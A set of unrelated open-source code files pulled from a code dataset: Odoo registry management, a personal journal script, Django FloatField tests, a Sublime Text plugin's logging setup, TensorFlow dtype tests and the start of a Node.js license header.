models_to_load = [] # need to preserve loading order
lazy_property.reset_all(self)
# Instantiate registered classes (via the MetaModel automatic discovery
# or via explicit constructor call), and add them to the pool.
for cls in models.MetaModel.module_to_models.get(module.name, []):
# models register themselves in self.models
model = cls._build_model(self, cr)
if model._name not in models_to_load:
# avoid double-loading models whose declaration is split
models_to_load.append(model._name)
return [self.models[m] for m in models_to_load]
def setup_models(self, cr):
""" Complete the setup of models.
This must be called after loading modules and before using the ORM.
"""
# prepare the setup on all models
for model in self.models.itervalues():
model._prepare_setup_fields(cr, SUPERUSER_ID)
# do the actual setup from a clean state
self._m2m = {}
for model in self.models.itervalues():
model._setup_fields(cr, SUPERUSER_ID)
def clear_caches(self):
""" Clear the caches
This clears the caches associated to methods decorated with
``tools.ormcache`` or ``tools.ormcache_multi`` for all the models.
"""
for model in self.models.itervalues():
model.clear_caches()
# Special case for ir_ui_menu which does not use openerp.tools.ormcache.
ir_ui_menu = self.models.get('ir.ui.menu')
if ir_ui_menu is not None:
ir_ui_menu.clear_cache()
# Useful only in a multi-process context.
def reset_any_cache_cleared(self):
self._any_cache_cleared = False
# Useful only in a multi-process context.
def any_cache_cleared(self):
return self._any_cache_cleared
@classmethod
def setup_multi_process_signaling(cls, cr):
if not openerp.multi_process:
return None, None
# Inter-process signaling:
# The `base_registry_signaling` sequence indicates the whole registry
# must be reloaded.
# The `base_cache_signaling sequence` indicates all caches must be
# invalidated (i.e. cleared).
cr.execute("""SELECT sequence_name FROM information_schema.sequences WHERE sequence_name='base_registry_signaling'""")
if not cr.fetchall():
cr.execute("""CREATE SEQUENCE base_registry_signaling INCREMENT BY 1 START WITH 1""")
cr.execute("""SELECT nextval('base_registry_signaling')""")
cr.execute("""CREATE SEQUENCE base_cache_signaling INCREMENT BY 1 START WITH 1""")
cr.execute("""SELECT nextval('base_cache_signaling')""")
cr.execute("""
SELECT base_registry_signaling.last_value,
base_cache_signaling.last_value
FROM base_registry_signaling, base_cache_signaling""")
r, c = cr.fetchone()
_logger.debug("Multiprocess load registry signaling: [Registry: # %s] "\
"[Cache: # %s]",
r, c)
return r, c
def enter_test_mode(self):
""" Enter the 'test' mode, where one cursor serves several requests. """
assert self.test_cr is None
self.test_cr = self._db.test_cursor()
RegistryManager.enter_test_mode()
def leave_test_mode(self):
""" Leave the test mode. """
assert self.test_cr is not None
self.test_cr.force_close()
self.test_cr = None
RegistryManager.leave_test_mode()
def cursor(self):
""" Return a new cursor for the database. The cursor itself may be used
as a context manager to commit/rollback and close automatically.
"""
cr = self.test_cr
if cr is not None:
# While in test mode, we use one special cursor across requests. The
# test cursor uses a reentrant lock to serialize accesses. The lock
# is granted here by cursor(), and automatically released by the
# cursor itself in its method close().
cr.acquire()
return cr
return self._db.cursor()
class DummyRLock(object):
""" Dummy reentrant lock, to be used while running rpc and js tests """
def acquire(self):
pass
def release(self):
pass
def __enter__(self):
self.acquire()
def __exit__(self, type, value, traceback):
self.release()
class RegistryManager(object):
""" Model registries manager.
The manager is responsible for creation and deletion of model
registries (essentially database connection/model registry pairs).
"""
# Mapping between db name and model registry.
# Accessed through the methods below.
registries = {}
_lock = threading.RLock()
_saved_lock = None
@classmethod
def lock(cls):
""" Return the current registry lock. """
return cls._lock
@classmethod
def enter_test_mode(cls):
""" Enter the 'test' mode, where the registry is no longer locked. """
assert cls._saved_lock is None
cls._lock, cls._saved_lock = DummyRLock(), cls._lock
@classmethod
def leave_test_mode(cls):
""" Leave the 'test' mode. """
assert cls._saved_lock is not None
cls._lock, cls._saved_lock = cls._saved_lock, None
@classmethod
def get(cls, db_name, force_demo=False, status=None, update_module=False):
""" Return a registry for a given database name."""
with cls.lock():
try:
return cls.registries[db_name]
except KeyError:
return cls.new(db_name, force_demo, status,
update_module)
finally:
# set db tracker - cleaned up at the WSGI
# dispatching phase in openerp.service.wsgi_server.application
threading.current_thread().dbname = db_name
@classmethod
def new(cls, db_name, force_demo=False, status=None,
update_module=False):
""" Create and return a new registry for a given database name.
The (possibly) previous registry for that database name is discarded.
"""
import openerp.modules
with cls.lock():
with openerp.api.Environment.manage():
registry = Registry(db_name)
# Initializing a registry will call general code which will in
# turn call registries.get (this object) to obtain the registry
# being initialized. Make it available in the registries
# dictionary then remove it if an exception is raised.
cls.delete(db_name)
cls.registries[db_name] = registry
try:
with registry.cursor() as cr:
seq_registry, seq_cache = Registry.setup_multi_process_signaling(cr)
registry.base_registry_signaling_sequence = seq_registry
registry.base_cache_signaling_sequence = seq_cache
# This should be a method on Registry
openerp.modules.load_modules(registry._db, force_demo, status, update_module)
except Exception:
del cls.registries[db_name]
raise
# load_modules() above can replace the registry by calling
# indirectly new() again (when modules have to be uninstalled).
# Yeah, crazy.
registry = cls.registries[db_name]
cr = registry.cursor()
try:
registry.do_parent_store(cr)
cr.commit()
finally:
cr.close()
registry.ready = True
if update_module:
# only in case of update, otherwise we'll have an infinite reload loop!
cls.signal_registry_change(db_name)
return registry
@classmethod
def delete(cls, db_name):
"""Delete the registry linked to a given database. """
with cls.lock():
if db_name in cls.registries:
cls.registries[db_name].clear_caches()
del cls.registries[db_name]
@classmethod
def delete_all(cls):
"""Delete all the registries. """
with cls.lock():
for db_name in cls.registries.keys():
cls.delete(db_name)
@classmethod
def clear_caches(cls, db_name):
"""Clear caches
This clears the caches associated to methods decorated with
``tools.ormcache`` or ``tools.ormcache_multi`` for all the models
of the given database name.
This method is given to spare you a ``RegistryManager.get(db_name)``
that would loads the given database if it was not already loaded.
"""
with cls.lock():
if db_name in cls.registries:
cls.registries[db_name].clear_caches()
@classmethod
def check_registry_signaling(cls, db_name):
"""
Check if the modules have changed and performs all necessary operations to update
the registry of the corresponding database.
:returns: True if changes has been detected in the database and False otherwise.
"""
changed = False
if openerp.multi_process and db_name in cls.registries:
registry = cls.get(db_name)
cr = registry.cursor()
try:
cr.execute("""
SELECT base_registry_signaling.last_value,
base_cache_signaling.last_value
FROM base_registry_signaling, base_cache_signaling""")
r, c = cr.fetchone()
_logger.debug("Multiprocess signaling check: [Registry - old# %s new# %s] "\
"[Cache - old# %s new# %s]",
registry.base_registry_signaling_sequence, r,
registry.base_cache_signaling_sequence, c)
# Check if the model registry must be reloaded (e.g. after the
# database has been updated by another process).
if registry.base_registry_signaling_sequence is not None and registry.base_registry_signaling_sequence != r:
changed = True
_logger.info("Reloading the model registry after database signaling.")
registry = cls.new(db_name)
# Check if the model caches must be invalidated (e.g. after a write
# occured on another process). Don't clear right after a registry
# has been reload.
elif registry.base_cache_signaling_sequence is not None and registry.base_cache_signaling_sequence != c:
changed = True
_logger.info("Invalidating all model caches after database signaling.")
registry.clear_caches()
registry.reset_any_cache_cleared()
# One possible reason caches have been invalidated is the
# use of decimal_precision.write(), in which case we need
# to refresh fields.float columns.
for model in registry.models.values():
for column in model._columns.values():
if hasattr(column, 'digits_change'):
column.digits_change(cr)
registry.base_registry_signaling_sequence = r
registry.base_cache_signaling_sequence = c
finally:
cr.close()
return changed
@classmethod
def signal_caches_change(cls, db_name):
if openerp.multi_process and db_name in cls.registries:
# Check the registries if any cache has been cleared and signal it
# through the database to other processes.
registry = cls.get(db_name)
if registry.any_cache_cleared():
_logger.info("At least one model cache has been cleared, signaling through the database.")
cr = registry.cursor()
r = 1
try:
cr.execute("select nextval('base_cache_signaling')")
r = cr.fetchone()[0]
finally:
cr.close()
registry.base_cache_signaling_sequence = r
registry.reset_any_cache_cleared()
@classmethod
def signal_registry_change(cls, db_name):
if openerp.multi_process and db_name in cls.registries:
_logger.info("Registry changed, signaling through the database")
registry = cls.get(db_name)
cr = registry.cursor()
r = 1
try:
cr.execute("select nextval('base_registry_signaling')")
r = cr.fetchone()[0]
finally:
cr.close()
registry.base_registry_signaling_sequence = r
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | unknown | codeparrot/codeparrot-clean | ||
# lifepim.py
import os
import sys
import aikif.project as mod_prj
import aikif.core_data as mod_core
import aikif.dataTools.cls_datatable as mod_dat
#print(sys.version)
def main():
fname = 'journal.csv'
p = mod_prj.Project('Journal Record')
print(p.nme)
# Attempt #1 - using DataTable directly (TOK)
dt = mod_dat.DataTable(fname, ',', col_names=['date', 'category', 'details'])
dt.add(['2015-05-11', 'Software', 'creating LP_ADD_DATA.py to record journal to diary'])
dt.add(['2015-05-11', 'Software', 'update readme'])
dt.add(['2015-05-11', 'Shopping', 'bought jeans'])
print(dt)
"""
date category details
11/05/2015 Software creating LP_ADD_DATA.py to record journal to diary
11/05/2015 Software update readme
11/05/2015 Shopping bought jeans
"""
dt.save_csv(fname)
# attempt #2 using Core DATA (TOK)
e = mod_core.Event('Sales Meeting', '2015-04-11', 'Office', 'Meet with client to discuss custom software')
print(e.format_csv())
# attempt #3 use an Events class to manage it all
ev = Events(os.getcwd(), 'D', 'DAT')
ev.add(mod_core.Event('Sales Meeting', '2014-01-11', 'Office', 'Catchup with client'))
ev.add(mod_core.Event('Sales Meeting#3', '2015-03-11', 'Office', 'Catchup with client'))
ev.add(mod_core.Event('DEV AIKIF - core data', '2015-05-11', 'Software', 'update TEST - no test for CORE_DATA'))
ev.add(mod_core.Event('DEV LifePim - core data', '2015-03-11', 'Software', 'use data for LifePim'))
ev.add(mod_core.Event('DEV AIKIF - data tools', '2015-05-11', 'Software', 'fix data tools '))
print(ev)
ev.save()
txt = 'Catchup' # 'data'
print('\n Searching for ', txt)
srch = ev.find(txt)
for s in srch:
print(s) # s.data[2]
class Events():
"""
class for Diary or LifePIM to handle all events
"""
def __init__(self, fldr, filename_base, user):
self.filename_base = filename_base
self.user = user
self.fldr = fldr
self.events = [] # list of events
self.header = mod_core.Event('Name', 'Date', 'Journal', 'Details')
def __str__(self):
res = ''
res += ' basename = ' + self.filename_base + '\n'
res += ' user = ' + self.user + '\n'
res += ' fldr = ' + self.fldr + '\n'
for e in self.events:
res += e.format_csv()
return res
def get_filename(self, event):
"""
returns the old style D201505.user format of filename
"""
return self.fldr + os.sep + self.filename_base + '201505' + '.' + self.user
def add(self, e):
self.events.append(e)
def find(self, txt):
result = []
for e in self.events:
if txt in e.data[2]:
result.append(e)
#print(e)
return result
def save(self):
"""
save all events to folder in appropriate files
NOTE - ONLY APPEND AT THIS STAGE - THEN USE DATABASE
"""
for e in self.events:
fname = self.get_filename(e)
with open(fname, 'a') as f:
f.write(e.format_csv())
if __name__ == '__main__':
main() | unknown | codeparrot/codeparrot-clean | ||
from __future__ import unicode_literals
from django.forms import FloatField, NumberInput, ValidationError
from django.test import SimpleTestCase
from django.utils import formats, translation
from . import FormFieldAssertionsMixin
class FloatFieldTest(FormFieldAssertionsMixin, SimpleTestCase):
def test_floatfield_1(self):
f = FloatField()
self.assertWidgetRendersTo(f, '<input step="any" type="number" name="f" id="id_f" required />')
with self.assertRaisesMessage(ValidationError, "'This field is required.'"):
f.clean('')
with self.assertRaisesMessage(ValidationError, "'This field is required.'"):
f.clean(None)
self.assertEqual(1.0, f.clean('1'))
self.assertIsInstance(f.clean('1'), float)
self.assertEqual(23.0, f.clean('23'))
self.assertEqual(3.1400000000000001, f.clean('3.14'))
self.assertEqual(3.1400000000000001, f.clean(3.14))
self.assertEqual(42.0, f.clean(42))
with self.assertRaisesMessage(ValidationError, "'Enter a number.'"):
f.clean('a')
self.assertEqual(1.0, f.clean('1.0 '))
self.assertEqual(1.0, f.clean(' 1.0'))
self.assertEqual(1.0, f.clean(' 1.0 '))
with self.assertRaisesMessage(ValidationError, "'Enter a number.'"):
f.clean('1.0a')
self.assertIsNone(f.max_value)
self.assertIsNone(f.min_value)
with self.assertRaisesMessage(ValidationError, "'Enter a number.'"):
f.clean('Infinity')
with self.assertRaisesMessage(ValidationError, "'Enter a number.'"):
f.clean('NaN')
with self.assertRaisesMessage(ValidationError, "'Enter a number.'"):
f.clean('-Inf')
def test_floatfield_2(self):
f = FloatField(required=False)
self.assertIsNone(f.clean(''))
self.assertIsNone(f.clean(None))
self.assertEqual(1.0, f.clean('1'))
self.assertIsNone(f.max_value)
self.assertIsNone(f.min_value)
def test_floatfield_3(self):
f = FloatField(max_value=1.5, min_value=0.5)
self.assertWidgetRendersTo(
f,
'<input step="any" name="f" min="0.5" max="1.5" type="number" id="id_f" required />',
)
with self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 1.5.'"):
f.clean('1.6')
with self.assertRaisesMessage(ValidationError, "'Ensure this value is greater than or equal to 0.5.'"):
f.clean('0.4')
self.assertEqual(1.5, f.clean('1.5'))
self.assertEqual(0.5, f.clean('0.5'))
self.assertEqual(f.max_value, 1.5)
self.assertEqual(f.min_value, 0.5)
def test_floatfield_widget_attrs(self):
f = FloatField(widget=NumberInput(attrs={'step': 0.01, 'max': 1.0, 'min': 0.0}))
self.assertWidgetRendersTo(
f,
'<input step="0.01" name="f" min="0.0" max="1.0" type="number" id="id_f" required />',
)
def test_floatfield_localized(self):
"""
A localized FloatField's widget renders to a text input without any
number input specific attributes.
"""
f = FloatField(localize=True)
self.assertWidgetRendersTo(f, '<input id="id_f" name="f" type="text" required />')
def test_floatfield_changed(self):
f = FloatField()
n = 4.35
self.assertFalse(f.has_changed(n, '4.3500'))
with translation.override('fr'), self.settings(USE_L10N=True):
f = FloatField(localize=True)
localized_n = formats.localize_input(n) # -> '4,35' in French
self.assertFalse(f.has_changed(n, localized_n)) | unknown | codeparrot/codeparrot-clean | ||
import os
import sublime
import logging
from logging.handlers import RotatingFileHandler
import tempfile
mm_dir = os.path.dirname(__file__)
sublime_version = int(float(sublime.version()))
settings = None
merge_settings = None
logger = None
def setup_logging():
try:
settings = sublime.load_settings('mavensmate.sublime-settings')
logging.raiseExceptions = False
logging.basicConfig(level=logging.DEBUG)
log_location = settings.get('mm_log_location', tempfile.gettempdir())
logging_handler = RotatingFileHandler(os.path.join(log_location, "mmst.log"), maxBytes=1*1024*1024, backupCount=5)
#mm log setup
global logger
logger = logging.getLogger('mmst')
logger.setLevel(logging.DEBUG)
logger.propagate = False
logger.addHandler(logging_handler)
except:
pass #TODO: need to handle this permission denied error (https://github.com/joeferraro/MavensMate-SublimeText/issues/293)
def debug(msg, obj=None):
try:
if obj != None and type(msg) is str:
logger.debug(msg + ' ', obj)
print('[MAVENSMATE]: ' + msg + ' ', obj)
elif obj == None and type(msg) is str:
logger.debug(msg)
print('[MAVENSMATE]:',msg)
else:
logger.debug(msg)
print('[MAVENSMATE]:',msg)
except:
if obj != None and type(msg) is str:
print('[MAVENSMATE]: ' + msg + ' ', obj)
elif obj == None and type(msg) is str:
print('[MAVENSMATE]:',msg)
else:
print('[MAVENSMATE]:',msg) | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.framework.dtypes."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.core.framework import types_pb2
from tensorflow.python.framework import _dtypes
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.platform import googletest
def _is_numeric_dtype_enum(datatype_enum):
non_numeric_dtypes = [types_pb2.DT_VARIANT,
types_pb2.DT_VARIANT_REF,
types_pb2.DT_INVALID,
types_pb2.DT_RESOURCE,
types_pb2.DT_RESOURCE_REF]
return datatype_enum not in non_numeric_dtypes
class TypesTest(test_util.TensorFlowTestCase):
def testAllTypesConstructible(self):
for datatype_enum in types_pb2.DataType.values():
if datatype_enum == types_pb2.DT_INVALID:
continue
self.assertEqual(datatype_enum,
dtypes.DType(datatype_enum).as_datatype_enum)
def testAllTypesConvertibleToDType(self):
for datatype_enum in types_pb2.DataType.values():
if datatype_enum == types_pb2.DT_INVALID:
continue
dt = dtypes.as_dtype(datatype_enum)
self.assertEqual(datatype_enum, dt.as_datatype_enum)
def testAllTypesConvertibleToNumpyDtype(self):
for datatype_enum in types_pb2.DataType.values():
if not _is_numeric_dtype_enum(datatype_enum):
continue
dtype = dtypes.as_dtype(datatype_enum)
numpy_dtype = dtype.as_numpy_dtype
_ = np.empty((1, 1, 1, 1), dtype=numpy_dtype)
if dtype.base_dtype != dtypes.bfloat16:
# NOTE(touts): Intentionally no way to feed a DT_BFLOAT16.
self.assertEqual(
dtypes.as_dtype(datatype_enum).base_dtype,
dtypes.as_dtype(numpy_dtype))
def testAllPybind11DTypeConvertibleToDType(self):
for datatype_enum in types_pb2.DataType.values():
if datatype_enum == types_pb2.DT_INVALID:
continue
dtype = _dtypes.DType(datatype_enum)
self.assertEqual(dtypes.as_dtype(datatype_enum), dtype)
def testInvalid(self):
with self.assertRaises(TypeError):
dtypes.DType(types_pb2.DT_INVALID)
with self.assertRaises(TypeError):
dtypes.as_dtype(types_pb2.DT_INVALID)
def testNumpyConversion(self):
self.assertIs(dtypes.float32, dtypes.as_dtype(np.float32))
self.assertIs(dtypes.float64, dtypes.as_dtype(np.float64))
self.assertIs(dtypes.int32, dtypes.as_dtype(np.int32))
self.assertIs(dtypes.int64, dtypes.as_dtype(np.int64))
self.assertIs(dtypes.uint8, dtypes.as_dtype(np.uint8))
self.assertIs(dtypes.uint16, dtypes.as_dtype(np.uint16))
self.assertIs(dtypes.int16, dtypes.as_dtype(np.int16))
self.assertIs(dtypes.int8, dtypes.as_dtype(np.int8))
self.assertIs(dtypes.complex64, dtypes.as_dtype(np.complex64))
self.assertIs(dtypes.complex128, dtypes.as_dtype(np.complex128))
self.assertIs(dtypes.string, dtypes.as_dtype(np.object_))
self.assertIs(dtypes.string,
dtypes.as_dtype(np.array(["foo", "bar"]).dtype))
self.assertIs(dtypes.bool, dtypes.as_dtype(np.bool_))
with self.assertRaises(TypeError):
dtypes.as_dtype(np.dtype([("f1", np.uint), ("f2", np.int32)]))
class AnObject(object):
dtype = "f4"
self.assertIs(dtypes.float32, dtypes.as_dtype(AnObject))
class AnotherObject(object):
dtype = np.dtype(np.complex64)
self.assertIs(dtypes.complex64, dtypes.as_dtype(AnotherObject))
def testRealDtype(self):
for dtype in [
dtypes.float32, dtypes.float64, dtypes.bool, dtypes.uint8, dtypes.int8,
dtypes.int16, dtypes.int32, dtypes.int64
]:
self.assertIs(dtype.real_dtype, dtype)
self.assertIs(dtypes.complex64.real_dtype, dtypes.float32)
self.assertIs(dtypes.complex128.real_dtype, dtypes.float64)
def testStringConversion(self):
self.assertIs(dtypes.float32, dtypes.as_dtype("float32"))
self.assertIs(dtypes.float64, dtypes.as_dtype("float64"))
self.assertIs(dtypes.int32, dtypes.as_dtype("int32"))
self.assertIs(dtypes.uint8, dtypes.as_dtype("uint8"))
self.assertIs(dtypes.uint16, dtypes.as_dtype("uint16"))
self.assertIs(dtypes.int16, dtypes.as_dtype("int16"))
self.assertIs(dtypes.int8, dtypes.as_dtype("int8"))
self.assertIs(dtypes.string, dtypes.as_dtype("string"))
self.assertIs(dtypes.complex64, dtypes.as_dtype("complex64"))
self.assertIs(dtypes.complex128, dtypes.as_dtype("complex128"))
self.assertIs(dtypes.int64, dtypes.as_dtype("int64"))
self.assertIs(dtypes.bool, dtypes.as_dtype("bool"))
self.assertIs(dtypes.qint8, dtypes.as_dtype("qint8"))
self.assertIs(dtypes.quint8, dtypes.as_dtype("quint8"))
self.assertIs(dtypes.qint32, dtypes.as_dtype("qint32"))
self.assertIs(dtypes.bfloat16, dtypes.as_dtype("bfloat16"))
self.assertIs(dtypes.float32_ref, dtypes.as_dtype("float32_ref"))
self.assertIs(dtypes.float64_ref, dtypes.as_dtype("float64_ref"))
self.assertIs(dtypes.int32_ref, dtypes.as_dtype("int32_ref"))
self.assertIs(dtypes.uint8_ref, dtypes.as_dtype("uint8_ref"))
self.assertIs(dtypes.int16_ref, dtypes.as_dtype("int16_ref"))
self.assertIs(dtypes.int8_ref, dtypes.as_dtype("int8_ref"))
self.assertIs(dtypes.string_ref, dtypes.as_dtype("string_ref"))
self.assertIs(dtypes.complex64_ref, dtypes.as_dtype("complex64_ref"))
self.assertIs(dtypes.complex128_ref, dtypes.as_dtype("complex128_ref"))
self.assertIs(dtypes.int64_ref, dtypes.as_dtype("int64_ref"))
self.assertIs(dtypes.bool_ref, dtypes.as_dtype("bool_ref"))
self.assertIs(dtypes.qint8_ref, dtypes.as_dtype("qint8_ref"))
self.assertIs(dtypes.quint8_ref, dtypes.as_dtype("quint8_ref"))
self.assertIs(dtypes.qint32_ref, dtypes.as_dtype("qint32_ref"))
self.assertIs(dtypes.bfloat16_ref, dtypes.as_dtype("bfloat16_ref"))
with self.assertRaises(TypeError):
dtypes.as_dtype("not_a_type")
def testDTypesHaveUniqueNames(self):
dtypez = []
names = set()
for datatype_enum in types_pb2.DataType.values():
if datatype_enum == types_pb2.DT_INVALID:
continue
dtype = dtypes.as_dtype(datatype_enum)
dtypez.append(dtype)
names.add(dtype.name)
self.assertEqual(len(dtypez), len(names))
def testIsInteger(self):
self.assertEqual(dtypes.as_dtype("int8").is_integer, True)
self.assertEqual(dtypes.as_dtype("int16").is_integer, True)
self.assertEqual(dtypes.as_dtype("int32").is_integer, True)
self.assertEqual(dtypes.as_dtype("int64").is_integer, True)
self.assertEqual(dtypes.as_dtype("uint8").is_integer, True)
self.assertEqual(dtypes.as_dtype("uint16").is_integer, True)
self.assertEqual(dtypes.as_dtype("complex64").is_integer, False)
self.assertEqual(dtypes.as_dtype("complex128").is_integer, False)
self.assertEqual(dtypes.as_dtype("float").is_integer, False)
self.assertEqual(dtypes.as_dtype("double").is_integer, False)
self.assertEqual(dtypes.as_dtype("string").is_integer, False)
self.assertEqual(dtypes.as_dtype("bool").is_integer, False)
self.assertEqual(dtypes.as_dtype("bfloat16").is_integer, False)
self.assertEqual(dtypes.as_dtype("qint8").is_integer, False)
self.assertEqual(dtypes.as_dtype("qint16").is_integer, False)
self.assertEqual(dtypes.as_dtype("qint32").is_integer, False)
self.assertEqual(dtypes.as_dtype("quint8").is_integer, False)
self.assertEqual(dtypes.as_dtype("quint16").is_integer, False)
def testIsFloating(self):
self.assertEqual(dtypes.as_dtype("int8").is_floating, False)
self.assertEqual(dtypes.as_dtype("int16").is_floating, False)
self.assertEqual(dtypes.as_dtype("int32").is_floating, False)
self.assertEqual(dtypes.as_dtype("int64").is_floating, False)
self.assertEqual(dtypes.as_dtype("uint8").is_floating, False)
self.assertEqual(dtypes.as_dtype("uint16").is_floating, False)
self.assertEqual(dtypes.as_dtype("complex64").is_floating, False)
self.assertEqual(dtypes.as_dtype("complex128").is_floating, False)
self.assertEqual(dtypes.as_dtype("float32").is_floating, True)
self.assertEqual(dtypes.as_dtype("float64").is_floating, True)
self.assertEqual(dtypes.as_dtype("string").is_floating, False)
self.assertEqual(dtypes.as_dtype("bool").is_floating, False)
self.assertEqual(dtypes.as_dtype("bfloat16").is_floating, True)
self.assertEqual(dtypes.as_dtype("qint8").is_floating, False)
self.assertEqual(dtypes.as_dtype("qint16").is_floating, False)
self.assertEqual(dtypes.as_dtype("qint32").is_floating, False)
self.assertEqual(dtypes.as_dtype("quint8").is_floating, False)
self.assertEqual(dtypes.as_dtype("quint16").is_floating, False)
def testIsComplex(self):
self.assertEqual(dtypes.as_dtype("int8").is_complex, False)
self.assertEqual(dtypes.as_dtype("int16").is_complex, False)
self.assertEqual(dtypes.as_dtype("int32").is_complex, False)
self.assertEqual(dtypes.as_dtype("int64").is_complex, False)
self.assertEqual(dtypes.as_dtype("uint8").is_complex, False)
self.assertEqual(dtypes.as_dtype("uint16").is_complex, False)
self.assertEqual(dtypes.as_dtype("complex64").is_complex, True)
self.assertEqual(dtypes.as_dtype("complex128").is_complex, True)
self.assertEqual(dtypes.as_dtype("float32").is_complex, False)
self.assertEqual(dtypes.as_dtype("float64").is_complex, False)
self.assertEqual(dtypes.as_dtype("string").is_complex, False)
self.assertEqual(dtypes.as_dtype("bool").is_complex, False)
self.assertEqual(dtypes.as_dtype("bfloat16").is_complex, False)
self.assertEqual(dtypes.as_dtype("qint8").is_complex, False)
self.assertEqual(dtypes.as_dtype("qint16").is_complex, False)
self.assertEqual(dtypes.as_dtype("qint32").is_complex, False)
self.assertEqual(dtypes.as_dtype("quint8").is_complex, False)
self.assertEqual(dtypes.as_dtype("quint16").is_complex, False)
def testIsUnsigned(self):
self.assertEqual(dtypes.as_dtype("int8").is_unsigned, False)
self.assertEqual(dtypes.as_dtype("int16").is_unsigned, False)
self.assertEqual(dtypes.as_dtype("int32").is_unsigned, False)
self.assertEqual(dtypes.as_dtype("int64").is_unsigned, False)
self.assertEqual(dtypes.as_dtype("uint8").is_unsigned, True)
self.assertEqual(dtypes.as_dtype("uint16").is_unsigned, True)
self.assertEqual(dtypes.as_dtype("float32").is_unsigned, False)
self.assertEqual(dtypes.as_dtype("float64").is_unsigned, False)
self.assertEqual(dtypes.as_dtype("bool").is_unsigned, False)
self.assertEqual(dtypes.as_dtype("string").is_unsigned, False)
self.assertEqual(dtypes.as_dtype("complex64").is_unsigned, False)
self.assertEqual(dtypes.as_dtype("complex128").is_unsigned, False)
self.assertEqual(dtypes.as_dtype("bfloat16").is_unsigned, False)
self.assertEqual(dtypes.as_dtype("qint8").is_unsigned, False)
self.assertEqual(dtypes.as_dtype("qint16").is_unsigned, False)
self.assertEqual(dtypes.as_dtype("qint32").is_unsigned, False)
self.assertEqual(dtypes.as_dtype("quint8").is_unsigned, False)
self.assertEqual(dtypes.as_dtype("quint16").is_unsigned, False)
def testMinMax(self):
# make sure min/max evaluates for all data types that have min/max
for datatype_enum in types_pb2.DataType.values():
if not _is_numeric_dtype_enum(datatype_enum):
continue
dtype = dtypes.as_dtype(datatype_enum)
numpy_dtype = dtype.as_numpy_dtype
# ignore types for which there are no minimum/maximum (or we cannot
# compute it, such as for the q* types)
if (dtype.is_quantized or dtype.base_dtype == dtypes.bool or
dtype.base_dtype == dtypes.string or
dtype.base_dtype == dtypes.complex64 or
dtype.base_dtype == dtypes.complex128):
continue
print("%s: %s - %s" % (dtype, dtype.min, dtype.max))
# check some values that are known
if numpy_dtype == np.bool_:
self.assertEqual(dtype.min, 0)
self.assertEqual(dtype.max, 1)
if numpy_dtype == np.int8:
self.assertEqual(dtype.min, -128)
self.assertEqual(dtype.max, 127)
if numpy_dtype == np.int16:
self.assertEqual(dtype.min, -32768)
self.assertEqual(dtype.max, 32767)
if numpy_dtype == np.int32:
self.assertEqual(dtype.min, -2147483648)
self.assertEqual(dtype.max, 2147483647)
if numpy_dtype == np.int64:
self.assertEqual(dtype.min, -9223372036854775808)
self.assertEqual(dtype.max, 9223372036854775807)
if numpy_dtype == np.uint8:
self.assertEqual(dtype.min, 0)
self.assertEqual(dtype.max, 255)
if numpy_dtype == np.uint16:
if dtype == dtypes.uint16:
self.assertEqual(dtype.min, 0)
self.assertEqual(dtype.max, 65535)
elif dtype == dtypes.bfloat16:
self.assertEqual(dtype.min, 0)
self.assertEqual(dtype.max, 4294967295)
if numpy_dtype == np.uint32:
self.assertEqual(dtype.min, 0)
self.assertEqual(dtype.max, 4294967295)
if numpy_dtype == np.uint64:
self.assertEqual(dtype.min, 0)
self.assertEqual(dtype.max, 18446744073709551615)
if numpy_dtype in (np.float16, np.float32, np.float64):
self.assertEqual(dtype.min, np.finfo(numpy_dtype).min)
self.assertEqual(dtype.max, np.finfo(numpy_dtype).max)
if numpy_dtype == dtypes.bfloat16.as_numpy_dtype:
self.assertEqual(dtype.min, float.fromhex("-0x1.FEp127"))
self.assertEqual(dtype.max, float.fromhex("0x1.FEp127"))
def testRepr(self):
self.skipTest("b/142725777")
for enum, name in dtypes._TYPE_TO_STRING.items():
if enum > 100:
continue
dtype = dtypes.DType(enum)
self.assertEqual(repr(dtype), "tf." + name)
import tensorflow as tf
dtype2 = eval(repr(dtype))
self.assertEqual(type(dtype2), dtypes.DType)
self.assertEqual(dtype, dtype2)
def testEqWithNonTFTypes(self):
self.assertNotEqual(dtypes.int32, int)
self.assertNotEqual(dtypes.float64, 2.1)
def testPythonLongConversion(self):
self.assertIs(dtypes.int64, dtypes.as_dtype(np.array(2**32).dtype))
def testPythonTypesConversion(self):
self.assertIs(dtypes.float32, dtypes.as_dtype(float))
self.assertIs(dtypes.bool, dtypes.as_dtype(bool))
def testReduce(self):
for enum in dtypes._TYPE_TO_STRING:
dtype = dtypes.DType(enum)
ctor, args = dtype.__reduce__()
self.assertEqual(ctor, dtypes.as_dtype)
self.assertEqual(args, (dtype.name,))
reconstructed = ctor(*args)
self.assertEqual(reconstructed, dtype)
def testAsDtypeInvalidArgument(self):
with self.assertRaises(TypeError):
dtypes.as_dtype((dtypes.int32, dtypes.float32))
def testAsDtypeReturnsInternedVersion(self):
dt = dtypes.DType(types_pb2.DT_VARIANT)
self.assertIs(dtypes.as_dtype(dt), dtypes.variant)
if __name__ == "__main__":
googletest.main() | unknown | codeparrot/codeparrot-clean | ||
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
